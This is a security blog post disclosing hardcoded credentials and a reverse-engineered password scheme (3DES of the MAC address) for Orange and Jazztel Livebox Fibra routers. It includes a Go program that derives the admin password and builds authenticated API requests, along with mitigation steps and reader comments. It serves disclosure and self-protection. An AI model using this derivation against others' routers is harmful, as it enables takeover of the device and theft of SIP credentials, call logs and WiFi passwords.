Thursday, 21 September 2017

Full Remote Control Livebox Fibra Router Orange and Jazztel Spain


Recently Jazztel (my ISP) replaced the router I was using (a ZTE H218N) with a new one known as "Livebox Fibra". This router is deployed by both Jazztel and Orange here in Spain. A lot of people have been trying to extract the SIP data and the ONT password from it in order to configure their own custom routers. There are some public ways to root the router, but we are not going to talk about that in this blog post.

In this blog post I am going to introduce a security issue in this router that allows an attacker to take full control of it if the router's web server is exposed to the Internet, or if the attacker is on the router's LAN (for example, through a malicious app on the smartphone of the router's owner).

The router provides a web page to configure it.


But you can also use an iOS and Android app to configure the router (called "Mi Livebox"):


The first time I started the app, I was surprised because it showed the router status without asking me for a user and password. I was also able to modify some router parameters without entering any credentials. I thought: "I need to know what magic it is using to do this!" ;P

I configured Burp Proxy on my phone and started looking at the traffic.
Do you see that? No? It is using HTTP Basic Auth! But what is it using as user and password?

base64decode('[AUTH_HEADER]') = ApiUsr:ApiUsrPass

So it is using a hardcoded user and password!
But it only uses these credentials in the first call to the router API (http://192.168.1.1/API/WAN), which returns the router's MAC address and other general information. The rest of the API endpoints do not accept this user and password.


If we look at the rest of the requests to the API, we can see that every other request carries different auth info. If we decode that Base64 string, we obtain the following:
UsrAdmin:[Some Trash]

So it seems that the password for the "UsrAdmin" user is generated from some other data. I said: "Ok, let's decompile and reverse engineer the APK" ;P

In com/orange/milivebox/es/main/utils/Utils.smali we find the function "lambda$getCredentialsAPIrouter$0", which takes as parameters the MAC address of the router and a variable called "secret", whose value is "MiLiveBoxApp".



This function does the following:
  1. Removes the ":" from the MAC address: cleanedMac = mac.replace(":","")
  2. Computes the MD5 of the "secret" variable ("MiLiveBoxApp").
  3. Appends the first 16 hex chars of that MD5 to the full MD5 hex string. MD5("MiLiveBoxApp") = "62ea048211246ab16d2ef5729b7520ad", so the final key is key="62ea048211246ab16d2ef5729b7520ad62ea048211246ab1" (48 hex characters, i.e. 24 bytes once decoded, which is exactly the key length TripleDES expects).
  4. Encrypts cleanedMac with TripleDES in ECB mode using the generated key. The resulting ciphertext is the password.

Now we know how the app and the router generate the password. Everything that goes into it is either public (the "secret" is hardcoded in an APK anyone can download) or handed out by the router itself (the MAC address, which /API/WAN returns to the hardcoded ApiUsr credentials), so anyone who can reach the web server can generate the password and make requests to configure whatever they want in the router. An attacker could simply ship a malicious app that steals your SIP data (accessible at the endpoint http://192.168.1.1/API/VoIP/SIP/Lines/), reads your call log (http://192.168.1.1/API/CallRegistry), gets or sets your WiFi password (http://192.168.1.1/API/LAN/WIFI/), or whatever else they want.
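As an added worked example (my own code, not the author's LiveboxFibraExtractor tool and not code from the app), here is the derivation above in Go, which has 3DES and MD5 in its standard library, plus a builder for the Basic-auth requests to the API. Two details the post does not spell out are assumptions here, marked in comments: the 48-hex-character key is decoded to 24 raw bytes (two-key 3DES, with the third DES key equal to the first), and the padding is PKCS#5, Java's default for Cipher.getInstance("DESede"). The MAC address is a constructed sample, the password bytes are kept raw (that is the "trash" after the colon), the Content-Type on a PUT is a guess, and nothing is sent on the network: the request builder is the same one you would use for the /API/Access/LanApi PUT described in the protection section.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/md5"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"net/http"
	"strings"
)

// Reported in the post: the APK "secret" and the hard-coded credential used only for GET /API/WAN.
const (
	appSecret     = "MiLiveBoxApp"
	bootstrapUser = "ApiUsr"
	bootstrapPass = "ApiUsrPass"
)

// DeriveKey returns MD5(secret) || first 8 bytes of the digest (the post's "first 16 hex chars").
// Assumption: the 48 hex chars are decoded to 24 raw bytes, i.e. two-key 3DES with K3 = K1.
func DeriveKey(secret string) []byte {
	sum := md5.Sum([]byte(secret))
	return append(append([]byte{}, sum[:]...), sum[:8]...)
}

// tripleDESECB runs 3DES block by block (Go ships no ECB helper) with PKCS#5 padding.
// Assumption: PKCS#5 is Java's default for Cipher.getInstance("DESede"), so it is what the app gets.
func tripleDESECB(key, in []byte, encrypt bool) ([]byte, error) {
	block, err := des.NewTripleDESCipher(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if encrypt {
		n := bs - len(in)%bs // always pad, so the 12 MAC bytes become two blocks
		in = append(append([]byte{}, in...), bytes.Repeat([]byte{byte(n)}, n)...)
	} else if len(in) == 0 || len(in)%bs != 0 {
		return nil, errors.New("ciphertext is not a whole number of blocks")
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += bs {
		if encrypt {
			block.Encrypt(out[i:i+bs], in[i:i+bs])
		} else {
			block.Decrypt(out[i:i+bs], in[i:i+bs])
		}
	}
	if encrypt {
		return out, nil
	}
	n := int(out[len(out)-1]) // verify and strip the padding
	if n == 0 || n > bs || !bytes.Equal(out[len(out)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#5 padding")
	}
	return out[:len(out)-n], nil
}

// RouterPassword is what the app derives for UsrAdmin (and UsrOrange): 3DES of mac.replace(":", "")
// as raw ciphertext, hence the "trash" after the colon. The MAC's case is kept as given: pass it
// exactly as /API/WAN returns it (assumption: the app does no case conversion).
func RouterPassword(mac string) ([]byte, error) {
	return tripleDESECB(DeriveKey(appSecret), []byte(strings.ReplaceAll(mac, ":", "")), true)
}

// BasicAuth builds the Authorization value; the password may be arbitrary bytes.
func BasicAuth(user string, password []byte) string {
	return "Basic " + base64.StdEncoding.EncodeToString(append([]byte(user+":"), password...))
}

// NewAPIRequest builds (but does not send) an API request: GET /API/WAN with the bootstrap credential,
// then any other endpoint with the derived one, including the PUT to /API/Access/LanApi that replaces it.
func NewAPIRequest(method, base, path, user string, password []byte, body string) (*http.Request, error) {
	req, err := http.NewRequest(method, base+path, strings.NewReader(body))
	if err != nil {
		return nil, err
	}
	req.Header.Set("Authorization", BasicAuth(user, password))
	if body != "" {
		req.Header.Set("Content-Type", "application/json") // assumption: not visible in the captures
	}
	return req, nil
}

func main() {
	mac := "00:11:22:33:44:55" // constructed sample value, not a real device
	pw, err := RouterPassword(mac)
	if err != nil {
		panic(err)
	}
	fmt.Printf("3DES key (hex):    %s\n", hex.EncodeToString(DeriveKey(appSecret)))
	fmt.Printf("UsrAdmin pw (hex): %s\n", hex.EncodeToString(pw))
	wan, _ := NewAPIRequest("GET", "http://192.168.1.1", "/API/WAN", bootstrapUser, []byte(bootstrapPass), "")
	sip, _ := NewAPIRequest("GET", "http://192.168.1.1", "/API/VoIP/SIP/Lines/", "UsrAdmin", pw, "")
	fmt.Println(wan.URL, wan.Header.Get("Authorization"))
	fmt.Println(sip.URL, sip.Header.Get("Authorization"))
}
```

Run it with `go run`; the first line it prints is the derived key, which should match the 48-hex-character value above if MD5("MiLiveBoxApp") is as reported. If a real router rejects the derived credential, the two assumptions (raw-byte key and PKCS#5 padding) are the first things to vary, followed by the case of the MAC string.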

You can get a list of the available endpoints in: http://192.168.1.1/API/Capabilities

There is also a "UsrOrange" user with the same password as "UsrAdmin". It is also allowed to access the API. It seems to be a special user for support.

What to do if you are a customer / How to protect yourself

The latest firmware version is "AR_LBFIBRA_sp-00.03.04.112S(Thu Aug 31 17:59:39 2017)". There is no fix for this issue, so you have to protect yourself:
  1. Do not expose your router to the Internet. Check the NAT / port-forwarding configuration on your router; there are a significant number of these routers exposed on Shodan.
  2. The endpoints "http://192.168.1.1/API/Access/LanApi" (for UsrAdmin) and "http://192.168.1.1/API/Access/OspApi" (for UsrOrange) accept "GET" and "PUT" requests. GET returns the current password for UsrAdmin and UsrOrange, and you can change it by sending a "PUT" request with the following body (and then rebooting your router):
    1. http://192.168.1.1/API/Access/LanApi, for UsrAdmin: {"User":"UsrAdmin","Password":"NewPassword"}
    2. http://192.168.1.1/API/Access/OspApi, for UsrOrange: {"User":"UsrOrange","Password":"NewPassword"}
    Change both users: leaving UsrOrange at the derived password leaves the same door open. Keep in mind that the official Mi Livebox app derives the password from the MAC address, so once you change it the app will stop working against your router, together with any malicious app relying on the same derivation.
  3. Configure another router instead.

Tools

Since a lot of people want to extract their SIP data to configure other routers, I have developed a small tool in Java that extracts the SIP data from the router using this security issue. The tool also lets you change your UsrAdmin and UsrOrange passwords to protect yourself from malicious apps.

You can download and check the source code here: https://github.com/segura2010/LiveboxFibraExtractor

I hope you liked this blog post! See you in the next post!

10 comments:

  1. Hi there, I'm getting this error: java.lang.RuntimeException: java.lang.RuntimeException: org.json.JSONException: A JSONArray text must start with '[' at 1 [character 2 line 1]
    Do you know what this could mean? Seems like something is out of place, please advise...

  2. I really like the title of your blog. It is well thought out. Good advice, too. Regards

  3. Security, especially for companies, is very important. I have known people who, through being too trusting or not understanding the matter, left their website in bad hands and had it taken from them.

  4. Dear Alberto, it seems the API URL your app exploits is no longer accessible. It is impossible for me to extract the SIP data; could you please check whether this is true? Many thanks in advance for your time ;-)

  5. Hi Alberto, can your tool be used to extract the SIP information from a Livebox 2.1?

  6. Hi Alberto, do we have any news about the new update?

  7. Hi Alberto, great work on your part; I hope you release something soon, I'm already desperate to get rid of the Livebox. Thanks.

  8. Hi, and is there any way to change the DNS servers, which are locked? It would be a great help.
    Regards.